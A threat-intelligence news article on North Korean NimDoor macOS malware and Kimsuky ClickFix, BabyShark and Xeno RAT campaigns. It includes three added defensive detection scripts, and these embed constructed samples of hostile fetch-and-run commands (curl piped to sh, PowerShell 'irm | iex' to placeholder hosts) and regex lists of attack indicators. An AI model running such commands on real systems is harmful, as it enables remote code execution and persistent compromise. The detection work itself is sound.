North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign

News Room, published 2 July 2025 (last updated 2025/07/02 at 3:02 PM)

Threat actors with ties to North Korea have been observed targeting Web3 and cryptocurrency-related businesses with malware written in the Nim programming language, underscoring a constant evolution of their tactics.

“Unusually for macOS malware, the threat actors employ a process injection technique and remote communications via wss, the TLS-encrypted version of the WebSocket protocol,” SentinelOne researchers Phil Stokes and Raffaele Sabato said in a report shared with The Hacker News.

“A novel persistence mechanism takes advantage of SIGINT/SIGTERM signal handlers to install persistence when the malware is terminated or the system rebooted.”

The cybersecurity company is tracking the malware components collectively under the name NimDoor. It’s worth noting that some aspects of the campaign were previously documented by Huntabil.IT and later by Huntress and Validin, but with differences in the payloads deployed.

The attack chains involve social engineering tactics, approaching targets on messaging platforms like Telegram to schedule a Zoom meeting via Calendly, an appointment-scheduling service. The target is then sent an email containing a supposed Zoom meeting link along with instructions to run a Zoom SDK update script to ensure that they are running the latest version of the videoconferencing software.

This step results in the execution of an AppleScript that acts as a delivery vehicle for a second-stage script from a remote server, while ostensibly redirecting the user to a legitimate Zoom redirect link. The newly downloaded script subsequently unpacks ZIP archives containing binaries that are responsible for setting up persistence and launching information stealing bash scripts.

At the heart of the infection sequence is a C++ loader called InjectWithDyldArm64 (aka InjectWithDyld), which decrypts two embedded binaries named Target and trojan1_arm64. InjectWithDyldArm64 launches Target in a suspended state, injects the code of trojan1_arm64 into it, and then resumes execution of the suspended process.

The malware proceeds to establish communication with a remote server and fetch commands that allow it to gather system information, run arbitrary commands, and change or set the current working directory. The results of the execution are sent back to the server.

The trojan1_arm64 payload, for its part, is capable of downloading two more payloads, which come fitted with capabilities to harvest credentials from web browsers like Arc, Brave, Google Chrome, Microsoft Edge, and Mozilla Firefox, as well as extract data from the Telegram application.

Also dropped as part of the attacks is a collection of Nim-based executables that are used as a launchpad for CoreKitAgent, which monitors for user attempts to kill the malware process and ensures persistence.

“This behavior ensures that any user-initiated termination of the malware results in the deployment of the core components, making the code resilient to basic defensive actions,” the researchers said.


The malware also launches an AppleScript that beacons out every 30 seconds to one of two hard-coded command-and-control (C2) servers, while also exfiltrating a snapshot of the list of running processes and executing additional scripts sent by the server.
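The two behaviours described above, a job that re-establishes itself when killed and an AppleScript wrapper that beacons on a fixed cadence, both leave marks in launchd job definitions. The following triage script is an added example, not code from the SentinelOne report or from the malware; the page does not say which persistence artefact NimDoor writes, so the script assumes a LaunchAgent or LaunchDaemon plist, the most common user- and system-level mechanism. The two plists, their labels, paths and the host name are constructed for illustration, and the list of trusted program locations is an assumption to tune per fleet.

```python
"""Triage macOS launchd jobs for script-based persistence and beaconing.

Added example (not code from the SentinelOne report). The two plists below
are constructed for illustration; paths, labels and hosts are made up.
"""
import plistlib
import re
from pathlib import Path

# Locations a benign job's program normally lives in (assumption; tune per fleet).
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Applications/", "/Library/Apple/")
# A job whose program is an interpreter is running a script, not a signed app.
INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python", "python3", "perl", "ruby"}
HIDDEN_OR_TEMP = re.compile(r"(^/tmp/|^/private/tmp/|^/var/folders/|/\.[^/]+/)")
NETWORK_HINT = re.compile(r"(https?://|wss?://|\bn?s?curl\b|do shell script)", re.I)


def analyze_launch_job(plist_bytes: bytes) -> dict:
    """Return the job label, its program and the reasons it deserves a look.
    An empty reasons list means nothing stood out."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    program = args[0] if args else ""
    reasons = []
    if program and not program.startswith(TRUSTED_PREFIXES):
        reasons.append("program outside trusted locations")
    if HIDDEN_OR_TEMP.search(program):
        reasons.append("program in a temp or hidden directory")
    if program.rsplit("/", 1)[-1] in INTERPRETERS:
        reasons.append("program is a script interpreter")
    if any(NETWORK_HINT.search(a) for a in args[1:]):
        reasons.append("network fetch or shell execution baked into arguments")
    if job.get("KeepAlive"):
        reasons.append("KeepAlive set: launchd respawns the job when it is killed")
    interval = job.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:
        reasons.append(f"StartInterval {interval}s: beacon-like cadence")
    return {"label": job.get("Label", ""), "program": program, "reasons": reasons}


def scan_launch_dirs(dirs=None) -> list:
    """Apply analyze_launch_job to every plist in the usual launchd directories."""
    dirs = dirs or [Path.home() / "Library/LaunchAgents",
                    Path("/Library/LaunchAgents"), Path("/Library/LaunchDaemons")]
    results = []
    for d in dirs:
        for p in (d.glob("*.plist") if d.is_dir() else []):
            try:
                results.append({"path": str(p), **analyze_launch_job(p.read_bytes())})
            except Exception as exc:  # unreadable or malformed plist is itself notable
                results.append({"path": str(p), "label": "", "program": "",
                                "reasons": [f"unparseable: {exc}"]})
    return results


# Constructed sample 1: an ordinary app helper that starts at login.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array><string>/Applications/Example.app/Contents/MacOS/updater</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

# Constructed sample 2: an AppleScript wrapper that fetches and runs remote code
# every 30 seconds and is respawned if killed (host name is a placeholder).
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper.agent</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/osascript</string>
    <string>-e</string>
    <string>do shell script "curl -s https://c2.example.invalid/s | sh"</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
  <key>StartInterval</key><integer>30</integer>
</dict></plist>"""

if __name__ == "__main__":
    for blob in (BENIGN_PLIST, SUSPECT_PLIST):
        r = analyze_launch_job(blob)
        print(r["label"], "->", r["reasons"] or ["nothing notable"])
    for r in scan_launch_dirs():
        if r["reasons"]:
            print(r["path"], r["reasons"])
```

The benign sample produces no findings; the suspect sample is flagged on four counts (interpreter as program, remote fetch in the arguments, KeepAlive, 30-second interval). Note that the path check alone would have passed it, since /usr/bin/osascript is an Apple binary; the interpreter and argument checks are what catch script-based persistence of this kind.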

The findings demonstrate how North Korean threat actors are increasingly training their sights on macOS systems, weaponizing AppleScript to act as a post-exploitation backdoor to meet their data gathering goals.

“North Korean-aligned threat actors have previously experimented with Go and Rust, similarly combining scripts and compiled binaries into multi-stage attack chains,” the researchers said.

“However, Nim’s rather unique ability to execute functions during compile time allows attackers to blend complex behaviour into a binary with less obvious control flow, resulting in compiled binaries in which developer code and Nim runtime code are intermingled even at the function level.”

Kimsuky’s Use of ClickFix Continues

The disclosure comes as South Korean cybersecurity company Genians exposed Kimsuky's continued use of the ClickFix social engineering tactic to deliver a variety of remote access tools as part of a campaign dubbed BabyShark, a known cluster of activity attributed to the North Korean hacking group.

The attacks, first observed in January 2025 and aimed at national security experts in South Korea, use spear-phishing emails masquerading as interview requests from a legitimate German-language business newspaper to trick recipients into opening a malicious link that delivers a bogus RAR archive.

Present within the archive is a Visual Basic Script (VBS) file that’s engineered to open a decoy Google Docs file in the user’s web browser, while, in the background, malicious code is executed to establish persistence on the host via scheduled tasks and harvest system information.

Subsequent attacks observed in March 2025 have impersonated a senior U.S. national security official to deceive targets into opening a PDF attachment that included a list of questions related to a meeting during the official’s purported visit to South Korea.

“They also tried to trick the target into opening a manual and entering an authentication code, supposedly required to access a secure document,” Genians said. “While the original ‘ClickFix’ tactic tricked users into clicking to fix a specific error, this variant modified the approach by prompting users to copy and paste an authentication code to access a secure document.”

A similar tactic was documented by Proofpoint in April 2025, the difference being that the email message claimed to originate from a Japanese diplomat and urged the recipient to set up a meeting with the Japanese ambassador to the United States.

Once the obfuscated malicious PowerShell command is executed, a decoy Google Docs file is used as a distraction to conceal the execution of malicious code that establishes persistent communication with a C2 server to collect data and deliver additional payloads.

A second variant of the ClickFix strategy entails using a fake website mimicking a legitimate defense research job portal and populating it with bogus listings, causing site visitors who click on these postings to be served with a ClickFix-style pop-up message to open the Windows Run dialog and run a PowerShell command.

The command, for its part, guided users to download and install the Chrome Remote Desktop software on their systems, enabling remote control over SSH via the C2 server “kida.plusdocs.kro[.]kr.” Genians said it discovered a directory listing vulnerability in the C2 server that publicly exposed data likely collected from victims located across South Korea.

The C2 server also pointed to a China-based IP address that was found to hold a keylogging record containing a Proton Drive link; the ZIP archive hosted at that link is used to drop BabyShark malware on the infected Windows host through a multi-stage attack chain.

As recently as last month, Kimsuky is believed to have concocted yet another ClickFix variant, in which phony Naver CAPTCHA verification pages instruct victims to copy and paste PowerShell commands into the Windows Run dialog; the command launches an AutoIt script that siphons user information.
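Every ClickFix variant described above ends the same way: the victim pastes a command into the Windows Run dialog. Explorer records what was run there under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, one value per command with a trailing "\1" and an MRUList value giving the recency order, which makes that key a cheap place to triage a suspected ClickFix host. The script below is an added example, not code from Genians, Proofpoint or the campaign; the RunMRU sample is constructed, the host names are placeholders, and the indicator list and the threshold of three indicators for a "likely ClickFix" verdict are the author's assumptions. It goes slightly beyond the page by covering the "authentication code" and CAPTCHA lure comments and the Chrome Remote Desktop setup that the Genians variants used.

```python
"""Score Run-dialog (RunMRU) commands for ClickFix-style indicators.

Added example; the sample registry values are constructed, not from a real host.
"""
import re

RUNMRU_SUFFIX = "\\1"  # Explorer stores each RunMRU command with a trailing "\1"

# Each indicator is independent; a single bare interpreter name scores one,
# the interpreter-plus-remote-content-plus-concealment combination scores high.
INDICATORS = [
    ("interpreter", re.compile(
        r"\b(powershell|pwsh|mshta|cmd(\.exe)?\s+/c|wscript|cscript|certutil|bitsadmin)\b", re.I)),
    ("hidden_or_bypass", re.compile(
        r"-(w(indowstyle)?\s+hidden|nop(rofile)?|ep\s+bypass|exec(utionpolicy)?\s+bypass|noni(nteractive)?)\b", re.I)),
    ("encoded_command", re.compile(r"-(enc(odedcommand)?|e)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient|start-bitstransfer|curl)\b", re.I)),
    ("in_memory_exec", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("remote_url", re.compile(r"\b(https?|wss?|ftp)://[^\s\"']+", re.I)),
    # ClickFix pastes often end in a comment that mirrors the lure on screen.
    ("verification_lure", re.compile(r"#.*\b(captcha|robot|verification|verify|authentication code)\b", re.I)),
    # Chrome Remote Desktop setup, as used to hand the host to the operator.
    ("chrome_remote_desktop", re.compile(
        r"(remotedesktop\.google\.com|remoting_start_host|chromeremotedesktophost)", re.I)),
]


def score_run_command(raw: str) -> dict:
    """Strip the RunMRU suffix, match every indicator and return a verdict."""
    cmd = raw[:-len(RUNMRU_SUFFIX)] if raw.endswith(RUNMRU_SUFFIX) else raw
    hits = [name for name, rx in INDICATORS if rx.search(cmd)]
    if len(hits) >= 3:
        verdict = "likely ClickFix"
    elif len(hits) == 2:
        verdict = "review"
    else:
        verdict = "benign"
    return {"command": cmd, "indicators": hits, "score": len(hits), "verdict": verdict}


def parse_runmru(values: dict) -> list:
    """Walk RunMRU values most-recent-first, as given by the MRUList string."""
    order = values.get("MRUList", "")
    return [score_run_command(values[k]) for k in order if k in values]


# Constructed RunMRU export: value names a..c, MRUList "cba" = c is most recent.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": ('powershell -w hidden -nop -c "irm https://fix.example.invalid/fix.ps1 | iex" '
          "# I am not a robot: Verification ID 7731\\1"),
    "c": 'powershell -c "Start-Process https://remotedesktop.google.com/headless"\\1',
}

if __name__ == "__main__":
    for r in parse_runmru(SAMPLE_RUNMRU):
        print(f"[{r['verdict']:>15}] score={r['score']} {r['command'][:70]}")
```

On a live host the same function can be fed the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` or the values read from an exported hive; the RunMRU key only proves the command was typed into Run, so pair a hit with PowerShell script-block logging (event 4104) or process-creation telemetry to see what actually executed.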

“The ‘BabyShark’ campaign is known for its swift adoption of new attack techniques, often integrating them with script-based mechanisms,” the company said. “The ‘ClickFix’ tactic discussed in this report appears to be another case of publicly available methods being adapted for malicious use.”

In recent weeks, Kimsuky has also been linked to email phishing campaigns that seemingly originate from academic institutions, but distribute malware under the pretext of reviewing a research paper.


“The email prompted the recipient to open a HWP document file with a malicious OLE object attachment,” AhnLab said. “The document was password-protected, and the recipient had to enter the password provided in the email body to view the document.”

Opening the weaponized document activates the infection process, leading to the execution of a PowerShell script that performs extensive system reconnaissance and the deployment of the legitimate AnyDesk software for persistent remote access.

A prolific threat actor, Kimsuky constantly changes the tools, tactics, and techniques it uses for malware delivery; some of its cyber attacks also leverage GitHub as a stager for propagating an open-source trojan called Xeno RAT.

“The malware accesses the attacker’s private repositories using a hard-coded Github Personal Access Token (PAT),” ENKI WhiteHat said. “This token was used to download malware from a private repository and upload information collected from victim systems.”

According to the South Korean cybersecurity vendor, the attacks begin with spear-phishing emails with compressed archive attachments containing a Windows shortcut (LNK) file, which, in turn, is likely used to drop a PowerShell script that then downloads and launches the decoy document, as well as executes Xeno RAT and a PowerShell information stealer.

Other attack sequences have been found to utilize a PowerShell-based downloader that fetches a file with an RTF extension from Dropbox to ultimately launch Xeno RAT. The campaign shares infrastructure overlaps with another set of attacks that delivered a variant of Xeno RAT known as MoonPeak.

“The attacker managed not only the malware used in attacks but also uploaded and maintained infected system log files and exfiltrated information in private repositories using GitHub Personal Access Tokens (PATs),” ENKI noted. “This ongoing activity highlights the persistent and evolving nature of Kimsuky’s operations, including their use of both GitHub and Dropbox as part of their infrastructure.”
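A hard-coded GitHub Personal Access Token, as ENKI describes above, is a gift to the analyst: GitHub tokens carry fixed prefixes and lengths, so a sample that embeds one can be found with a strings-style scan, and the token itself can be reported to GitHub and revoked, cutting the operator off from both the payload repository and the exfiltration drop. The scanner below is an added example, not ENKI's tooling or anything from the malware. The token shapes follow GitHub's published prefixes (ghp_ for classic PATs, github_pat_ for fine-grained PATs, gho_/ghu_/ghs_/ghr_ for OAuth and app tokens) and the currently documented lengths; treat the lengths as an assumption that may need updating if GitHub changes the format. The sample blob and the two dummy tokens in it are constructed and are not real credentials.

```python
"""Find hard-coded GitHub tokens in an arbitrary binary or script blob.

Added example. Token prefixes and lengths follow GitHub's published format
(an assumption if the format changes). The sample blob is constructed.
"""
import re
from pathlib import Path
from typing import Dict, List

TOKEN_PATTERNS = {
    # classic PAT: ghp_ + 36 alphanumerics
    "classic_pat": re.compile(rb"\bghp_[A-Za-z0-9]{36}\b"),
    # fine-grained PAT: github_pat_ + 22 chars + "_" + 59 chars
    "fine_grained_pat": re.compile(rb"\bgithub_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}\b"),
    # OAuth (gho_), user-to-server (ghu_), server-to-server (ghs_), refresh (ghr_)
    "oauth_or_app": re.compile(rb"\bgh[osur]_[A-Za-z0-9]{36}\b"),
}
# Context strings that show the token is actually used against the API.
API_CONTEXT = re.compile(
    rb"(api\.github\.com|raw\.githubusercontent\.com|Authorization:\s*(token|Bearer))", re.I)


def redact(token: str) -> str:
    """Keep the prefix and the last four characters so a finding is traceable
    in a report without reproducing a usable secret."""
    head = token.split("_", 1)[0] + "_"
    return head + "*" * (len(token) - len(head) - 4) + token[-4:]


def find_github_tokens(blob: bytes) -> List[Dict]:
    """Return every token-shaped match with its kind, file offset and redaction,
    sorted by offset. Scanning raw bytes avoids decoding a binary first."""
    findings = []
    for kind, rx in TOKEN_PATTERNS.items():
        for m in rx.finditer(blob):
            tok = m.group().decode("ascii")
            findings.append({"kind": kind, "offset": m.start(), "redacted": redact(tok)})
    findings.sort(key=lambda f: f["offset"])
    return findings


def github_api_strings(blob: bytes) -> List[str]:
    """Distinct API-usage strings near which a found token is likely consumed."""
    return sorted({m.group(1).decode("ascii", "replace") for m in API_CONTEXT.finditer(blob)})


def scan_file(path: str) -> Dict:
    blob = Path(path).read_bytes()
    return {"path": path, "tokens": find_github_tokens(blob), "api_strings": github_api_strings(blob)}


# Constructed dummies with the right shape; none of these is a real token.
DUMMY_CLASSIC = "ghp_" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"  # 36 chars after the prefix
DUMMY_FINE = "github_pat_" + "A" * 22 + "_" + "b" * 59               # 22 + 59 chars
NEAR_MISS = "ghp_" + "A" * 35                                        # one char short: must not match

# Constructed PE-like blob: header bytes, an API URL, the tokens and a near miss.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 16
    + b"https://api.github.com/repos/example/private-repo/contents/\x00"
    + b"Authorization: token " + DUMMY_CLASSIC.encode() + b"\x00\x00"
    + b"upload.log\x00" + DUMMY_FINE.encode() + b"\x00"
    + NEAR_MISS.encode() + b"\x00"
)

if __name__ == "__main__":
    for f in find_github_tokens(SAMPLE_BLOB):
        print(f"{f['kind']:>17} @0x{f['offset']:04x} {f['redacted']}")
    print("API context:", github_api_strings(SAMPLE_BLOB))
```

Run `scan_file` over a dropped binary or the LNK-launched PowerShell script to get the same result for a real sample. Because the regexes anchor on word boundaries and exact lengths, a 35-character near miss is ignored while a token sitting between NUL bytes inside a binary is still found; an `Authorization: token` string alongside a hit is a strong sign the token is used as-is rather than being, say, a test fixture.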

Kimsuky, per data from NSFOCUS, has been one of the most active threat groups from Korea, alongside Konni, accounting for 5% of all the 44 advanced persistent threat (APT) activities recorded by the Chinese cybersecurity company in May 2025. In comparison, the top three most active APT groups in April were Kimsuky, Sidewinder, and Konni.
